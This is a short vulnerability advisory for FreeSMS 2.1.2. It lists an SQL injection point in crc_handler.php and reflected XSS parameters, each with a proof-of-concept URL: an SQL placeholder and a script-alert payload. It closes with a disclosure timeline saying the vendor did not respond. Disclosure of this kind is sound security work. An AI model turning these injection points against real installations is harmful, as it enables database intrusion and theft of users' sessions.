##################### ______ __ ______ / \ / | / \ /000000 | ______ ______ ______ 00 |____ _____ ____ ______ /000000 | ______ _______ 00 \__00/ / \ / \ / \ 00 \ / \/ \ / \ 00 \__00/ / \ / | 00 \ 000000 |/000000 |000000 |0000000 |000000 0000 | 000000 | 00 \ /000000 |/0000000/ 000000 | / 00 |00 | 00/ / 00 |00 | 00 |00 | 00 | 00 | / 00 | 000000 |00 00 |00 | / \__00 |/0000000 |00 | /0000000 |00 | 00 |00 | 00 | 00 |/0000000 | / \__00 |00000000/ 00 \_____ 00 00/ 00 00 |00 | 00 00 |00 | 00 |00 | 00 | 00 |00 00 | 00 00/ 00 |00 | 000000/ 0000000/ 00/ 0000000/ 00/ 00/ 00/ 00/ 00/ 0000000/ 000000/ 0000000/ 0000000/ ##################### # Exploit Title: FreeSMS (Free Student Management System) 2.1.2 Multiple Vulnerability # Date: 1 Oct 2013 # Vendor Homepage: http://freesms.sourceforge.net/ # Software Link: http://sourceforge.net/projects/freesms/ # Version: 2.1.2 # Tested on: Win 7/Backtrack # CVE : # Exploit Author: Sarahma Security # Author Homepage: http://sarahma.co.id # Author Email: research@sarahma.co.id ======================== SQL Injection ======================== Found on http://localhost/freesms/pages/crc_handler.php parameter : scheduleid http://localhost/freesms/pages/crc_handler.php?method=evaluation&func=getanswers&scheduleid=15{SQL_HERE} ======================== XSS Vulnerability ======================== Found On http://localhost/freesms/pages/crc_login.php parameter : uid Found On http://localhost/freesms/pages/crc_handler.php parameter : func and method Example: http://localhost/freesms/pages/crc_handler.php?method=profile&func=%3Cscript%3Ealert%28123%29%3C/script%3E ======================== Solution : ======================== No Update Until This Advisory published ======================== Timeline: ======================== 2013-09-26 Provided details vulnerability to vendor 2013-09-29 No Response From Vendor 2013-10-01 Advisory published